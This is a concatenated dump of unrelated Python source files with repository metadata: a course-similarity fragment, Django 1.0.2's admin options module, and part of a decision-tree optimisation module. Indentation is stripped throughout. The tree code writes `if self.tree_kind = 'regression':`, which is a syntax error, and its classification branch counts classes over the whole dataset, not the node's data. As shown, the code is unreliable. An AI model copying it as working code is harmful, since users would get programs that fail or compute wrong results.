A = self.VDF['Glove'][listCourse].T
#Calculate the embedding for the input course using the GloVe model.
B = self._GloveSim(testDf,inCourse).T
        #Take the cosine similarity of these two matrices. This creates a 4x4 matrix where each row represents
#one of the four categories (mean,stdev,max,min) of one course description and each column represents one of the four
#of the other course description.
sim = cosine_similarity(A,B)
        #The diagonal of this 4x4 matrix is a comparison of like categories across the two different course descriptions.
#By taking the average of this diagonal, a similarity score can be obtained.
result = np.average(np.diag(sim))
return result
# School Preq
#Jacard 0.762222 0.497531
#Lev 0.730000 0.475926
#WordSim 0.820000 0.517284
#DocSim 0.592222 0.444444
#GloveSim 0.598889 0.503704
|
[
"[email protected]"
] | |
9e5792142558cd46f6ba9a81e13b947bb2b6145c
|
37d612c90db933b059937b3e7ed91b06b1c22f88
|
/build/src/Django-1.0.2-final/django/contrib/admin/options.py
|
3d60b9ddf4842183dd54008172494e81d15f48fa
|
[
"BSD-3-Clause"
] |
permissive
|
taylanpince/alghalia
|
751aaba7bd01f955fc79c9e3a2bd69cc34d7bf41
|
b5a4949207e0604f035dea74538f655f73ccc2a3
|
refs/heads/master
| 2020-05-04T00:52:24.307879 | 2009-04-04T23:40:30 | 2009-04-04T23:40:30 | 155,763 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 35,792 |
py
|
from django import forms, template
from django.forms.formsets import all_valid
from django.forms.models import modelform_factory, inlineformset_factory
from django.forms.models import BaseInlineFormSet
from django.contrib.contenttypes.models import ContentType
from django.contrib.admin import widgets
from django.contrib.admin import helpers
from django.contrib.admin.util import quote, unquote, flatten_fieldsets, get_deleted_objects
from django.core.exceptions import PermissionDenied
from django.db import models, transaction
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.text import capfirst, get_text_list
from django.utils.translation import ugettext as _
from django.utils.encoding import force_unicode
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
HORIZONTAL, VERTICAL = 1, 2
# returns the <ul> class for a given radio_admin field
get_ul_class = lambda x: 'radiolist%s' % ((x == HORIZONTAL) and ' inline' or '')
class IncorrectLookupParameters(Exception):
pass
class BaseModelAdmin(object):
"""Functionality common to both ModelAdmin and InlineAdmin."""
raw_id_fields = ()
fields = None
exclude = None
fieldsets = None
form = forms.ModelForm
filter_vertical = ()
filter_horizontal = ()
radio_fields = {}
prepopulated_fields = {}
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
# If the field specifies choices, we don't need to look for special
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices:
if db_field.name in self.radio_fields:
# If the field is named as a radio_field, use a RadioSelect
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['choices'] = db_field.get_choices(
include_blank = db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
else:
# Otherwise, use the default select widget.
return db_field.formfield(**kwargs)
# For DateTimeFields, use a special field and widget.
if isinstance(db_field, models.DateTimeField):
kwargs['form_class'] = forms.SplitDateTimeField
kwargs['widget'] = widgets.AdminSplitDateTime()
return db_field.formfield(**kwargs)
# For DateFields, add a custom CSS class.
if isinstance(db_field, models.DateField):
kwargs['widget'] = widgets.AdminDateWidget
return db_field.formfield(**kwargs)
# For TimeFields, add a custom CSS class.
if isinstance(db_field, models.TimeField):
kwargs['widget'] = widgets.AdminTimeWidget
return db_field.formfield(**kwargs)
# For TextFields, add a custom CSS class.
if isinstance(db_field, models.TextField):
kwargs['widget'] = widgets.AdminTextareaWidget
return db_field.formfield(**kwargs)
# For URLFields, add a custom CSS class.
if isinstance(db_field, models.URLField):
kwargs['widget'] = widgets.AdminURLFieldWidget
return db_field.formfield(**kwargs)
# For IntegerFields, add a custom CSS class.
if isinstance(db_field, models.IntegerField):
kwargs['widget'] = widgets.AdminIntegerFieldWidget
return db_field.formfield(**kwargs)
# For CommaSeparatedIntegerFields, add a custom CSS class.
if isinstance(db_field, models.CommaSeparatedIntegerField):
kwargs['widget'] = widgets.AdminCommaSeparatedIntegerFieldWidget
return db_field.formfield(**kwargs)
# For TextInputs, add a custom CSS class.
if isinstance(db_field, models.CharField):
kwargs['widget'] = widgets.AdminTextInputWidget
return db_field.formfield(**kwargs)
# For FileFields and ImageFields add a link to the current file.
if isinstance(db_field, models.ImageField) or isinstance(db_field, models.FileField):
kwargs['widget'] = widgets.AdminFileWidget
return db_field.formfield(**kwargs)
# For ForeignKey or ManyToManyFields, use a special widget.
if isinstance(db_field, (models.ForeignKey, models.ManyToManyField)):
if isinstance(db_field, models.ForeignKey) and db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ForeignKeyRawIdWidget(db_field.rel)
elif isinstance(db_field, models.ForeignKey) and db_field.name in self.radio_fields:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['empty_label'] = db_field.blank and _('None') or None
else:
if isinstance(db_field, models.ManyToManyField):
# If it uses an intermediary model, don't show field in admin.
if db_field.rel.through is not None:
return None
elif db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(db_field.verbose_name, (db_field.name in self.filter_vertical))
# Wrap the widget's render() method with a method that adds
# extra HTML to the end of the rendered output.
formfield = db_field.formfield(**kwargs)
# Don't wrap raw_id fields. Their add function is in the popup window.
if not db_field.name in self.raw_id_fields:
# formfield can be None if it came from a OneToOneField with
# parent_link=True
if formfield is not None:
formfield.widget = widgets.RelatedFieldWidgetWrapper(formfield.widget, db_field.rel, self.admin_site)
return formfield
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
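    # Editor's example (an assumption, not part of Django's own source): project
    # code usually customizes this hook from a ModelAdmin subclass along these
    # lines, where MyRichTextWidget is a hypothetical widget class:
    #
    #   class ArticleAdmin(admin.ModelAdmin):
    #       def formfield_for_dbfield(self, db_field, **kwargs):
    #           if db_field.name == 'body':
    #               kwargs['widget'] = MyRichTextWidget()
    #           return super(ArticleAdmin, self).formfield_for_dbfield(db_field, **kwargs)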
def _declared_fieldsets(self):
if self.fieldsets:
return self.fieldsets
elif self.fields:
return [(None, {'fields': self.fields})]
return None
declared_fieldsets = property(_declared_fieldsets)
class ModelAdmin(BaseModelAdmin):
"Encapsulates all admin options and functionality for a given model."
__metaclass__ = forms.MediaDefiningClass
list_display = ('__str__',)
list_display_links = ()
list_filter = ()
list_select_related = False
list_per_page = 100
search_fields = ()
date_hierarchy = None
save_as = False
save_on_top = False
ordering = None
inlines = []
# Custom templates (designed to be over-ridden in subclasses)
change_form_template = None
change_list_template = None
delete_confirmation_template = None
object_history_template = None
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
self.inline_instances = []
for inline_class in self.inlines:
inline_instance = inline_class(self.model, self.admin_site)
self.inline_instances.append(inline_instance)
super(ModelAdmin, self).__init__()
def __call__(self, request, url):
# Delegate to the appropriate method, based on the URL.
if url is None:
return self.changelist_view(request)
elif url == "add":
return self.add_view(request)
elif url.endswith('/history'):
return self.history_view(request, unquote(url[:-8]))
elif url.endswith('/delete'):
return self.delete_view(request, unquote(url[:-7]))
else:
return self.change_view(request, unquote(url))
def _media(self):
from django.conf import settings
js = ['js/core.js', 'js/admin/RelatedObjectLookups.js']
if self.prepopulated_fields:
js.append('js/urlify.js')
if self.opts.get_ordered_objects():
js.extend(['js/getElementsBySelector.js', 'js/dom-drag.js' , 'js/admin/ordering.js'])
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
media = property(_media)
def has_add_permission(self, request):
"Returns True if the given request has permission to add an object."
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_add_permission())
def has_change_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance.
If `obj` is None, this should return True if the given request has
permission to change *any* object of the given type.
"""
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
def has_delete_permission(self, request, obj=None):
"""
        Returns True if the given request has permission to delete the given
Django model instance.
If `obj` is None, this should return True if the given request has
permission to delete *any* object of the given type.
"""
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_delete_permission())
def queryset(self, request):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
qs = self.model._default_manager.get_query_set()
# TODO: this should be handled by some parameter to the ChangeList.
ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)
if ordering:
qs = qs.order_by(*ordering)
return qs
def get_fieldsets(self, request, obj=None):
"Hook for specifying fieldsets for the add form."
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_form(request, obj)
return [(None, {'fields': form.base_fields.keys()})]
def get_form(self, request, obj=None, **kwargs):
"""
Returns a Form class for use in the admin add view. This is used by
add_view and change_view.
"""
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
defaults = {
"form": self.form,
"fields": fields,
"exclude": exclude + kwargs.get("exclude", []),
"formfield_callback": self.formfield_for_dbfield,
}
defaults.update(kwargs)
return modelform_factory(self.model, **defaults)
def get_formsets(self, request, obj=None):
for inline in self.inline_instances:
yield inline.get_formset(request, obj)
def log_addition(self, request, object):
"""
Log that an object has been successfully added.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, ADDITION
LogEntry.objects.log_action(
user_id = request.user.pk,
content_type_id = ContentType.objects.get_for_model(object).pk,
object_id = object.pk,
object_repr = force_unicode(object),
action_flag = ADDITION
)
def log_change(self, request, object, message):
"""
Log that an object has been successfully changed.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, CHANGE
LogEntry.objects.log_action(
user_id = request.user.pk,
content_type_id = ContentType.objects.get_for_model(object).pk,
object_id = object.pk,
object_repr = force_unicode(object),
action_flag = CHANGE,
change_message = message
)
def log_deletion(self, request, object, object_repr):
"""
Log that an object has been successfully deleted. Note that since the
object is deleted, it might no longer be safe to call *any* methods
on the object, hence this method getting object_repr.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, DELETION
LogEntry.objects.log_action(
user_id = request.user.id,
content_type_id = ContentType.objects.get_for_model(self.model).pk,
object_id = object.pk,
object_repr = object_repr,
action_flag = DELETION
)
def construct_change_message(self, request, form, formsets):
"""
Construct a change message from a changed object.
"""
change_message = []
if form.changed_data:
change_message.append(_('Changed %s.') % get_text_list(form.changed_data, _('and')))
if formsets:
for formset in formsets:
for added_object in formset.new_objects:
change_message.append(_('Added %(name)s "%(object)s".')
% {'name': added_object._meta.verbose_name,
'object': force_unicode(added_object)})
for changed_object, changed_fields in formset.changed_objects:
change_message.append(_('Changed %(list)s for %(name)s "%(object)s".')
% {'list': get_text_list(changed_fields, _('and')),
'name': changed_object._meta.verbose_name,
'object': force_unicode(changed_object)})
for deleted_object in formset.deleted_objects:
change_message.append(_('Deleted %(name)s "%(object)s".')
% {'name': deleted_object._meta.verbose_name,
'object': force_unicode(deleted_object)})
change_message = ' '.join(change_message)
return change_message or _('No fields changed.')
def message_user(self, request, message):
"""
Send a message to the user. The default implementation
posts a message using the auth Message object.
"""
request.user.message_set.create(message=message)
def save_form(self, request, form, change):
"""
Given a ModelForm return an unsaved instance. ``change`` is True if
the object is being changed, and False if it's being added.
"""
return form.save(commit=False)
def save_model(self, request, obj, form, change):
"""
Given a model instance save it to the database.
"""
obj.save()
def save_formset(self, request, form, formset, change):
"""
Given an inline formset save it to the database.
"""
formset.save()
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
opts = self.model._meta
app_label = opts.app_label
ordered_objects = opts.get_ordered_objects()
context.update({
'add': add,
'change': change,
'has_add_permission': self.has_add_permission(request),
'has_change_permission': self.has_change_permission(request, obj),
'has_delete_permission': self.has_delete_permission(request, obj),
'has_file_field': True, # FIXME - this should check if form or formsets have a FileField,
'has_absolute_url': hasattr(self.model, 'get_absolute_url'),
'ordered_objects': ordered_objects,
'form_url': mark_safe(form_url),
'opts': opts,
'content_type_id': ContentType.objects.get_for_model(self.model).id,
'save_as': self.save_as,
'save_on_top': self.save_on_top,
'root_path': self.admin_site.root_path,
})
return render_to_response(self.change_form_template or [
"admin/%s/%s/change_form.html" % (app_label, opts.object_name.lower()),
"admin/%s/change_form.html" % app_label,
"admin/change_form.html"
], context, context_instance=template.RequestContext(request))
def response_add(self, request, obj, post_url_continue='../%s/'):
"""
Determines the HttpResponse for the add_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
msg = _('The %(name)s "%(obj)s" was added successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj)}
# Here, we distinguish between different save types by checking for
# the presence of keys in request.POST.
if request.POST.has_key("_continue"):
self.message_user(request, msg + ' ' + _("You may edit it again below."))
if request.POST.has_key("_popup"):
post_url_continue += "?_popup=1"
return HttpResponseRedirect(post_url_continue % pk_value)
if request.POST.has_key("_popup"):
return HttpResponse('<script type="text/javascript">opener.dismissAddAnotherPopup(window, "%s", "%s");</script>' % \
# escape() calls force_unicode.
(escape(pk_value), escape(obj)))
elif request.POST.has_key("_addanother"):
self.message_user(request, msg + ' ' + (_("You may add another %s below.") % force_unicode(opts.verbose_name)))
return HttpResponseRedirect(request.path)
else:
self.message_user(request, msg)
# Figure out where to redirect. If the user has change permission,
# redirect to the change-list page for this object. Otherwise,
# redirect to the admin index.
if self.has_change_permission(request, None):
post_url = '../'
else:
post_url = '../../../'
return HttpResponseRedirect(post_url)
def response_change(self, request, obj):
"""
Determines the HttpResponse for the change_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
msg = _('The %(name)s "%(obj)s" was changed successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj)}
if request.POST.has_key("_continue"):
self.message_user(request, msg + ' ' + _("You may edit it again below."))
if request.REQUEST.has_key('_popup'):
return HttpResponseRedirect(request.path + "?_popup=1")
else:
return HttpResponseRedirect(request.path)
elif request.POST.has_key("_saveasnew"):
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % {'name': force_unicode(opts.verbose_name), 'obj': obj}
self.message_user(request, msg)
return HttpResponseRedirect("../%s/" % pk_value)
elif request.POST.has_key("_addanother"):
self.message_user(request, msg + ' ' + (_("You may add another %s below.") % force_unicode(opts.verbose_name)))
return HttpResponseRedirect("../add/")
else:
self.message_user(request, msg)
return HttpResponseRedirect("../")
def add_view(self, request, form_url='', extra_context=None):
"The 'add' admin view for this model."
model = self.model
opts = model._meta
if not self.has_add_permission(request):
raise PermissionDenied
ModelForm = self.get_form(request)
formsets = []
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=False)
else:
form_validated = False
new_object = self.model()
for FormSet in self.get_formsets(request):
formset = FormSet(data=request.POST, files=request.FILES,
instance=new_object,
save_as_new=request.POST.has_key("_saveasnew"))
formsets.append(formset)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, change=False)
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=False)
self.log_addition(request, new_object)
return self.response_add(request, new_object)
else:
# Prepare the dict of initial data from the request.
# We have to special-case M2Ms as a list of comma-separated PKs.
initial = dict(request.GET.items())
for k in initial:
try:
f = opts.get_field(k)
except models.FieldDoesNotExist:
continue
if isinstance(f, models.ManyToManyField):
initial[k] = initial[k].split(",")
form = ModelForm(initial=initial)
for FormSet in self.get_formsets(request):
formset = FormSet(instance=self.model())
formsets.append(formset)
adminForm = helpers.AdminForm(form, list(self.get_fieldsets(request)), self.prepopulated_fields)
media = self.media + adminForm.media
inline_admin_formsets = []
for inline, formset in zip(self.inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset, fieldsets)
inline_admin_formsets.append(inline_admin_formset)
media = media + inline_admin_formset.media
context = {
'title': _('Add %s') % force_unicode(opts.verbose_name),
'adminform': adminForm,
'is_popup': request.REQUEST.has_key('_popup'),
'show_delete': False,
'media': mark_safe(media),
'inline_admin_formsets': inline_admin_formsets,
'errors': helpers.AdminErrorList(form, formsets),
'root_path': self.admin_site.root_path,
'app_label': opts.app_label,
}
context.update(extra_context or {})
return self.render_change_form(request, context, add=True)
add_view = transaction.commit_on_success(add_view)
def change_view(self, request, object_id, extra_context=None):
"The 'change' admin view for this model."
model = self.model
opts = model._meta
try:
obj = model._default_manager.get(pk=object_id)
except model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})
if request.method == 'POST' and request.POST.has_key("_saveasnew"):
return self.add_view(request, form_url='../../add/')
ModelForm = self.get_form(request, obj)
formsets = []
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=True)
else:
form_validated = False
new_object = obj
for FormSet in self.get_formsets(request, new_object):
formset = FormSet(request.POST, request.FILES,
instance=new_object)
formsets.append(formset)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, change=True)
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=True)
change_message = self.construct_change_message(request, form, formsets)
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form = ModelForm(instance=obj)
for FormSet in self.get_formsets(request, obj):
formset = FormSet(instance=obj)
formsets.append(formset)
adminForm = helpers.AdminForm(form, self.get_fieldsets(request, obj), self.prepopulated_fields)
media = self.media + adminForm.media
inline_admin_formsets = []
for inline, formset in zip(self.inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request, obj))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset, fieldsets)
inline_admin_formsets.append(inline_admin_formset)
media = media + inline_admin_formset.media
context = {
'title': _('Change %s') % force_unicode(opts.verbose_name),
'adminform': adminForm,
'object_id': object_id,
'original': obj,
'is_popup': request.REQUEST.has_key('_popup'),
'media': mark_safe(media),
'inline_admin_formsets': inline_admin_formsets,
'errors': helpers.AdminErrorList(form, formsets),
'root_path': self.admin_site.root_path,
'app_label': opts.app_label,
}
context.update(extra_context or {})
return self.render_change_form(request, context, change=True, obj=obj)
change_view = transaction.commit_on_success(change_view)
def changelist_view(self, request, extra_context=None):
"The 'change list' admin view for this model."
from django.contrib.admin.views.main import ChangeList, ERROR_FLAG
opts = self.model._meta
app_label = opts.app_label
if not self.has_change_permission(request, None):
raise PermissionDenied
try:
cl = ChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self)
except IncorrectLookupParameters:
# Wacky lookup parameters were given, so redirect to the main
# changelist page, without parameters, and pass an 'invalid=1'
# parameter via the query string. If wacky parameters were given and
# the 'invalid=1' parameter was already in the query string, something
# is screwed up with the database, so display an error page.
if ERROR_FLAG in request.GET.keys():
return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})
return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
context = {
'title': cl.title,
'is_popup': cl.is_popup,
'cl': cl,
'has_add_permission': self.has_add_permission(request),
'root_path': self.admin_site.root_path,
'app_label': app_label,
}
context.update(extra_context or {})
return render_to_response(self.change_list_template or [
'admin/%s/%s/change_list.html' % (app_label, opts.object_name.lower()),
'admin/%s/change_list.html' % app_label,
'admin/change_list.html'
], context, context_instance=template.RequestContext(request))
def delete_view(self, request, object_id, extra_context=None):
"The 'delete' admin view for this model."
opts = self.model._meta
app_label = opts.app_label
try:
obj = self.model._default_manager.get(pk=object_id)
except self.model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
deleted_objects = [mark_safe(u'%s: <a href="../../%s/">%s</a>' % (escape(force_unicode(capfirst(opts.verbose_name))), quote(object_id), escape(obj))), []]
perms_needed = set()
get_deleted_objects(deleted_objects, perms_needed, request.user, obj, opts, 1, self.admin_site)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_unicode(obj)
obj.delete()
self.log_deletion(request, obj, obj_display)
self.message_user(request, _('The %(name)s "%(obj)s" was deleted successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj_display)})
if not self.has_change_permission(request, None):
return HttpResponseRedirect("../../../../")
return HttpResponseRedirect("../../")
context = {
"title": _("Are you sure?"),
"object_name": force_unicode(opts.verbose_name),
"object": obj,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"opts": opts,
"root_path": self.admin_site.root_path,
"app_label": app_label,
}
context.update(extra_context or {})
return render_to_response(self.delete_confirmation_template or [
"admin/%s/%s/delete_confirmation.html" % (app_label, opts.object_name.lower()),
"admin/%s/delete_confirmation.html" % app_label,
"admin/delete_confirmation.html"
], context, context_instance=template.RequestContext(request))
def history_view(self, request, object_id, extra_context=None):
"The 'history' admin view for this model."
from django.contrib.admin.models import LogEntry
model = self.model
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id = object_id,
content_type__id__exact = ContentType.objects.get_for_model(model).id
).select_related().order_by('action_time')
# If no history was found, see whether this object even exists.
obj = get_object_or_404(model, pk=object_id)
context = {
'title': _('Change history: %s') % force_unicode(obj),
'action_list': action_list,
'module_name': capfirst(force_unicode(opts.verbose_name_plural)),
'object': obj,
'root_path': self.admin_site.root_path,
'app_label': app_label,
}
context.update(extra_context or {})
return render_to_response(self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.object_name.lower()),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context, context_instance=template.RequestContext(request))
class InlineModelAdmin(BaseModelAdmin):
"""
Options for inline editing of ``model`` instances.
Provide ``name`` to specify the attribute name of the ``ForeignKey`` from
``model`` to its parent. This is required if ``model`` has more than one
``ForeignKey`` to its parent.
"""
model = None
fk_name = None
formset = BaseInlineFormSet
extra = 3
max_num = 0
template = None
verbose_name = None
verbose_name_plural = None
def __init__(self, parent_model, admin_site):
self.admin_site = admin_site
self.parent_model = parent_model
self.opts = self.model._meta
super(InlineModelAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
def _media(self):
from django.conf import settings
js = []
if self.prepopulated_fields:
js.append('js/urlify.js')
if self.filter_vertical or self.filter_horizontal:
js.extend(['js/SelectBox.js' , 'js/SelectFilter2.js'])
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
media = property(_media)
def get_formset(self, request, obj=None, **kwargs):
"""Returns a BaseInlineFormSet class for use in admin add/change views."""
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
defaults = {
"form": self.form,
"formset": self.formset,
"fk_name": self.fk_name,
"fields": fields,
"exclude": exclude + kwargs.get("exclude", []),
"formfield_callback": self.formfield_for_dbfield,
"extra": self.extra,
"max_num": self.max_num,
}
defaults.update(kwargs)
return inlineformset_factory(self.parent_model, self.model, **defaults)
def get_fieldsets(self, request, obj=None):
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_formset(request).form
return [(None, {'fields': form.base_fields.keys()})]
class StackedInline(InlineModelAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularInline(InlineModelAdmin):
template = 'admin/edit_inline/tabular.html'
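# Illustrative usage of the inline classes defined above (added for clarity;
# not part of this module). A project's own admin.py would subclass
# TabularInline/ModelAdmin and register them; Author and Book below are
# hypothetical models:
#
#     class BookInline(admin.TabularInline):
#         model = Book
#         extra = 3
#
#     class AuthorAdmin(admin.ModelAdmin):
#         inlines = [BookInline]
#
#     admin.site.register(Author, AuthorAdmin)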
|
[
"[email protected]"
] | |
ea080f6a970422adc404cafa7a6c8b5224104598
|
4dea70c70d4ad0f8c761ecc619110b86a38f6721
|
/Optimization.py
|
3f1cfc402904003bfa2d5ab9394c3cf0567c0b50
|
[] |
no_license
|
homayunafra/Decision_Theoretic_Approach_for_Interpretability_in_Bayesian_Framework
|
af036a96e3eccae50b7ba6a4e5e021748d209e07
|
cb58964cc16b7ab6c3632da0d6066325b6f31d72
|
refs/heads/master
| 2023-04-06T02:48:51.729907 | 2021-04-29T08:48:11 | 2021-04-29T08:48:11 | 284,804,129 | 6 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,275 |
py
|
import tigraphs as tig
import numpy as np
import igraph as ig
from copy import deepcopy
from itertools import combinations
from math import log, floor, sqrt
from sklearn.model_selection import KFold
class DecisionNode(tig.BasicNode, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pivot=None
self.split_attribute=None
self.left=None
self.right=None
self.children=None
self.parent=None
self.size=0
self.depth=0
self.local_data=None
self.mu=None
self.prob_vec=list()
self.predicted_class=None
# assign data points to a newly generated node.
def local_filter(self, data):
if self.parent == None:
self.size = len(data)
return data
attribute = self.parent.split_attribute
pivot = self.parent.pivot
if type(pivot) == set:
ret = data[attribute].isin(pivot)
else:
ret = data[attribute] <= pivot
if self == self.parent.left:
ret = data[ret]
else:
ret = data[~ret]
self.size = len(ret)
return ret
# find the leaf to which the datapoint belongs
def get_data_leaf(self, datapoint):
if self.children == None:
return self
else:
if type(self.pivot) == set:
if datapoint[self.split_attribute] in self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
else:
if datapoint[self.split_attribute] <= self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
class DecisionTree(tig.return_tree_class(directed=True), object):
def __init__(self, Vertex = DecisionNode, **kwargs):
super().__init__(N=2, Vertex=Vertex, **kwargs)
# these are default, can be set by train
self.data_type_dict = {}
self.tree_kind = None
self.min_node_size = 1
self.max_node_depth = 5
self.data = None
self.data_size = 0
self.response = '' # response attribute
def fuse_vertex(self, vertex):
super().fuse_vertex(vertex)
vertex.left, vertex.right = None, None
vertex.pivot, vertex.split_attribute = None, None
# construct the tree using training data and an empty root vertex
def grow_tree(self, ref):
self.data_size = len(self.data)
self.create_vertex()
self.set_root(self.vertices[0])
self.leaves.add(self.vertices[0])
self.grow_node(self.get_root(), ref)
# grow each node until reaching the stopping condition
def grow_node(self, node, ref):
if node.parent is None:
node.local_data = node.local_filter(data=self.data)
        if self.tree_kind == 'regression':
self.set_node_mu_ml(node, ref)
else:
self.set_node_prob_vec(node)
if self.stopping_condition(node):
return
else:
try:
# select the best split (the one with minimum negative log-likelihood score)
best_split = min(self.iter_split_eval(node, ref), key=lambda x: x[0])
# no split has been selected yet, so fuse the node to erase the last split generated by iter_split()
self.fuse_vertex(node)
except ValueError:
return
            if self.tree_kind == 'regression':
''' compute the MLE estimate of the variance parameter of the tree before splitting any internal nodes.
check Step 1 of optimization algorithm in Section 3.2.1 of the paper '''
sigma = sum(self.get_node_sse(leaf, ref) for leaf in self.leaves) / self.data_size
base_impurity = node.size * log(sigma)
if base_impurity - best_split[0] <= 0:
return
# split the node based on the best split
self.split_vertex(node, split_attribute=best_split[1], pivot=best_split[2])
for child in node.children:
child.local_data = child.local_filter(data=node.local_data)
self.set_node_mu_ml(child, ref)
else:
value_count = self.data[self.response].value_counts()
node_class_ll = [value_count[key] * log(value_count[key] / node.size) for key in value_count.keys()]
node_neg_ll = -sum(node_class_ll)
if node_neg_ll - best_split[0] <= 0:
return
self.split_vertex(node, split_attribute=best_split[1], pivot=best_split[2])
for child in node.children:
child.local_data = child.local_filter(data=node.local_data)
                    self.set_node_prob_vec(child)
self.grow_node(node.left, ref)
self.grow_node(node.right, ref)
# prune the fully grown tree to avoid overfitting
def prune_tree(self, alpha, tst_data, ref, run, m_ind, output_path):
if alpha is None:
''' if alpha was none, we use cross-validation to construct a sequence of subtrees with their corresponding
alpha values, from which the best subtree will be selected as the pruned tree'''
subtree_ind = 1
subtree_seq = {}
alpha_seq = {}
while True:
try:
best_alpha, best_node = self.get_best_prune(ref)
self.fuse_vertex(best_node)
alpha_seq[subtree_ind] = best_alpha
subtree_seq[subtree_ind] = deepcopy(self)
subtree_ind += 1
except ValueError:
break
best_subtree_ind = self.cross_validate(alpha_seq, ref)
return subtree_seq[best_subtree_ind+1]
elif alpha == 0:
''' when alpha = 0, the algorithm prunes internal nodes one by one based on their prune cost with the goal
to construct the acc vs complexity plots (check Fig. 4 in the paper)'''
best_cost, best_node = self.get_best_prune(ref, alpha)
self.fuse_vertex(best_node)
treePerf = self.test(tst_data)
treeSize = len(self.leaves)
filename = output_path + "/result_proxy_" + str(m_ind) + "_" + str(run) + ".txt"
with open(filename, 'a+') as outputfile:
outputfile.write(str(treePerf) + "\t" + str(treeSize) + "\n")
outputfile.close()
if len(self.vertices) <= 3:
return
self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
